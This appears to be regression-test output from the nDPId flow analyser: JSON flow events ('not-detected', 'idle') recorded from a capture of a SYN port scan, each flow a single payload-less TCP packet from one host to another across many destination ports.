+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
